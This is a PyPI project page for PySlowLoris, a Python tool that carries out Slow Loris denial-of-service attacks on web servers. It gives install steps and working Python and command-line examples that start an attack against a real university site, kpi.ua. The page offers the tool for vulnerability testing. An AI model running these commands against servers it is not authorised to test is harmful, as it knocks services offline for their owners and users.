Small and simple tool for testing Slow Loris vulnerability
Project description
This repository was created for testing Slow Loris vulnerability on different web servers. SL based on keeping alive open connection as long as possible and sending some trash headers to the server. If you are interested what I’m trying doing here, please join my team and let’s do fun together. Please DO NOT use this in the real attacks on the servers.
The main reason why I’m writing this module it is to create the easy tool for the fast check a small personal or corporate web server what based on Apache and etc. Also, last but not least reason is to improve my skills in this sphere.
More information you can find here.
Installation
PyPi
To install PySlowLoris, run this command in your terminal:
$ pip install pyslowloris
This is the preferred method to install PySlowLoris, as it will always install the most recent stable release.
Source files
In case you downloaded or cloned the source code from GitHub or your own fork, you can run the following to install cameo for development:
$ git clone https://github.com/[username]/SlowLoris.git
$ cd SlowLoris
$ vitualenv --python=python[version] venv
$ source venv/bin/active
$ pip install --editable .
Docker Hub
Pulling image from Docker Hub and run container:
$ docker pull maxkivich/pyslowloris
$ docker run --rm -it maxkivich/pyslowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT]
Also you can build image from Dockerfile and run container:
$ docker build -t pyslowloris .
$ docker run --rm -it pyslowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT]
Note: Don’t forget about ‘sudo’!
Basic Usage
Available command list:
$ slowloris --help
usage: slowloris [-h] [-u URL] [-s SOCKET_COUNT] [-p PORT]
Small and simple tool for testing Slow Loris vulnerability
optional arguments:
-h show this help message and exit
-u URL link to the web server (http://google.com) - str
-s SOCKET_COUNT maximum count of created connection (default value 300) - int
-p PORT port what will be used - int
Using PySlowLoris from code
Here are some example to start attack from Python code
import time
from PySlowLoris import TargetInfo, SlowLorisAttack
target = TargetInfo(url="http://kpi.ua/", port=80)
target.get_info()
slowloris = SlowLorisAttack(target)
slowloris.start_attack() # stop_attack()
while True:
time.sleep(1)
Using PySlowLoris from terminal
The following command helps to use module from command line
$ slowloris -u http://kpi.ua/ -s 300
stop execution: Ctrl + C
Bugs, issues and contributing
If you find bugs or have suggestions about improving the module, don’t hesitate to contact me.
License
This project is licensed under the MIT License - see the LICENSE file for details
Copyright (c) 2017 Maxim Krivich
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distributions
Built Distribution
Hashes for PySlowLoris-0.1.3-py2.py3-none-any.whl
Algorithm | Hash digest | |
---|---|---|
SHA256 | f2c76b08545afe73c5aacf1529c94904a723f9d6315f0bd4db3b123e41081e53 |
|
MD5 | 56d8b9366d2eeb087ecd2fbae5f89d7d |
|
BLAKE2b-256 | f865c1f938ba35e50b499d9c82f88f6506340e71d4e443ec726983c21fec9455 |